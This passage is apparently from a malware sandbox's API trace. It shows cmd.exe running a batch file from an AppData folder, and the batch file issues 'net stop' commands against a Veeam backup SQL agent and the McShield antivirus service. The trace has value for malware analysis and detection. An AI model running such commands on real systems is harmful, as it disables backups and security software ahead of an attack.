_String2="DATE") returned 10 [0203.356] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0203.357] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0203.357] _wcsicmp (_String1="net", _String2="MD") returned 1 [0203.357] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0203.357] _wcsicmp (_String1="net", _String2="RD") returned -4 [0203.357] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0203.357] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0203.357] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0203.357] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0203.357] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0203.357] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0203.357] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0203.357] _wcsicmp (_String1="net", _String2="VER") returned -8 [0203.357] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0203.357] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0203.357] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0203.357] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0203.357] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0203.357] _wcsicmp (_String1="net", _String2="START") returned -5 [0203.357] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0203.357] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0203.357] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0203.357] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0203.357] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0203.357] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0203.357] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0203.357] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0203.357] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0203.357] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0203.358] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0203.358] SetErrorMode (uMode=0x0) returned 0x1 [0203.358] GetProcessHeap () returned 0x3e0000 [0203.358] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0203.358] GetProcessHeap () returned 0x3e0000 [0203.358] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0203.358] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.358] GetProcessHeap () returned 0x3e0000 [0203.358] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0203.358] GetProcessHeap () returned 0x3e0000 [0203.358] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0203.359] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0203.359] GetProcessHeap () returned 0x3e0000 [0203.359] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0203.359] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.359] GetProcessHeap () returned 0x3e0000 [0203.359] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0203.359] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0203.359] GetProcessHeap () returned 0x3e0000 [0203.359] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0203.360] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.360] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.360] GetLastError () returned 0x2 [0203.361] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.361] GetLastError () returned 0x2 [0203.361] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.361] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0203.362] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0203.362] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.362] GetLastError () returned 0x2 [0203.362] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0203.363] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0203.363] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.363] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0203.363] SetErrorMode (uMode=0x0) returned 0x1 [0203.364] GetProcessHeap () returned 0x3e0000 [0203.364] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0203.364] GetProcessHeap () returned 0x3e0000 [0203.364] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0203.364] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.364] GetProcessHeap () returned 0x3e0000 [0203.364] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0203.364] GetProcessHeap () returned 0x3e0000 [0203.364] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0203.365] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0203.365] GetProcessHeap () returned 0x3e0000 [0203.365] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0203.365] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.365] GetProcessHeap () returned 0x3e0000 [0203.365] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0203.365] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0203.365] GetProcessHeap () returned 0x3e0000 [0203.365] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0203.366] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.366] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.366] GetLastError () returned 0x2 [0203.366] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.366] GetLastError () returned 0x2 [0203.367] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.367] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0203.367] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0203.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0203.368] GetLastError () returned 0x2 [0203.368] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0203.368] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0203.369] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.369] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0203.369] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0203.369] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0203.369] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.369] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$VEEAMSQL2008R2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$VEEAMSQL2008R2 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$VEEAMSQL2008R2 /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xba0, dwThreadId=0x414)) returned 1 [0203.375] CloseHandle (hObject=0x74) returned 1 [0203.375] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.375] GetProcessHeap () returned 0x3e0000 [0203.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.375] GetEnvironmentStringsW () returned 0x3f8408* [0203.375] GetProcessHeap () returned 0x3e0000 [0203.375] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.375] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.375] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0203.522] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0203.522] CloseHandle (hObject=0x78) returned 1 [0203.522] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0203.522] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0203.522] GetProcessHeap () returned 0x3e0000 [0203.522] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.522] GetEnvironmentStringsW () returned 0x3f8408* [0203.522] GetProcessHeap () returned 0x3e0000 [0203.522] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.523] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.523] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0203.523] GetProcessHeap () returned 0x3e0000 [0203.523] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0203.523] GetEnvironmentStringsW () returned 0x3f8408* [0203.523] GetProcessHeap () returned 0x3e0000 [0203.523] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0203.523] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0203.523] GetProcessHeap () returned 0x3e0000 [0203.523] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0203.523] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0203.523] _get_osfhandle (_FileHandle=1) returned 0x264 [0203.523] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0203.523] _get_osfhandle (_FileHandle=1) returned 0x264 [0203.523] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0203.524] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0203.524] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0203.524] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0203.524] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0203.524] SetConsoleInputExeNameW () returned 0x1 [0203.524] GetConsoleOutputCP () returned 0x1b5 [0203.524] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0203.524] SetThreadUILanguage (LangId=0x0) returned 0x409 [0203.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0203.525] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0203.525] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.525] SetFilePointer (in: hFile=0x78, lDistanceToMove=3645, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe3d [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0203.525] GetProcessHeap () returned 0x3e0000 [0203.525] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0203.525] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.526] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe3d [0203.526] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xa84, lpOverlapped=0x0) returned 1 [0203.526] SetFilePointer (in: hFile=0x78, lDistanceToMove=3667, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe53 [0203.526] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=22, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop McShield /y\r\nMSQL2008R2 /y\r\ny\r\n/y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 22 [0203.526] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.526] GetFileType (hFile=0x78) returned 0x1 [0203.526] _get_osfhandle (_FileHandle=3) returned 0x78 [0203.526] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe53 [0203.526] GetProcessHeap () returned 0x3e0000 [0203.526] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0203.526] GetProcessHeap () returned 0x3e0000 [0203.526] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0203.529] _tell (_FileHandle=3) returned 3667 [0203.529] _close (_FileHandle=3) returned 0 [0203.529] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0203.529] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0203.530] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0203.530] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0203.530] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0203.530] _wcsicmp (_String1="net", _String2="CD") returned 11 [0203.530] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0203.530] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0203.530] _wcsicmp (_String1="net", _String2="REN") returned -4 [0203.530] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0203.530] _wcsicmp (_String1="net", _String2="SET") returned -5 [0203.530] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0203.530] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0203.530] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0203.530] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0203.530] _wcsicmp (_String1="net", _String2="MD") returned 1 [0203.530] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0203.530] _wcsicmp (_String1="net", _String2="RD") returned -4 [0203.530] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0203.530] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0203.530] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0203.530] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0203.530] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0203.530] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0203.530] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0203.530] _wcsicmp (_String1="net", _String2="VER") returned -8 [0203.530] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0203.530] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0203.530] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0203.530] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0203.530] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0203.530] _wcsicmp (_String1="net", _String2="START") returned -5 [0203.530] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0203.530] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0203.530] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0203.530] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0203.530] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0203.530] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0203.530] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0203.530] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0203.531] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0203.531] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0203.531] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0203.531] SetErrorMode (uMode=0x0) returned 0x1 [0203.531] GetProcessHeap () returned 0x3e0000 [0203.531] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0203.531] GetProcessHeap () returned 0x3e0000 [0203.531] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0203.531] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.531] GetProcessHeap () returned 0x3e0000 [0203.531] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0203.531] GetProcessHeap () returned 0x3e0000 [0203.532] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0203.532] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0203.532] GetProcessHeap () returned 0x3e0000 [0203.532] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0203.532] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.532] GetProcessHeap () returned 0x3e0000 [0203.532] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0203.532] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0203.532] GetProcessHeap () returned 0x3e0000 [0203.532] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0203.533] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.533] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.533] GetLastError () returned 0x2 [0203.534] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.534] GetLastError () returned 0x2 [0203.534] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0203.534] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0203.535] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0203.535] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0203.535] GetLastError () returned 0x2 [0203.535] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0203.536] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0203.536] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.536] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0203.537] SetErrorMode (uMode=0x0) returned 0x1 [0203.537] GetProcessHeap () returned 0x3e0000 [0203.537] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0203.537] GetProcessHeap () returned 0x3e0000 [0203.537] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0203.537] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.537] GetProcessHeap () returned 0x3e0000 [0203.537] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0203.537] GetProcessHeap () returned 0x3e0000 [0203.537] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0203.537] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0203.537] GetProcessHeap () returned 0x3e0000 [0203.537] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0203.538] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: 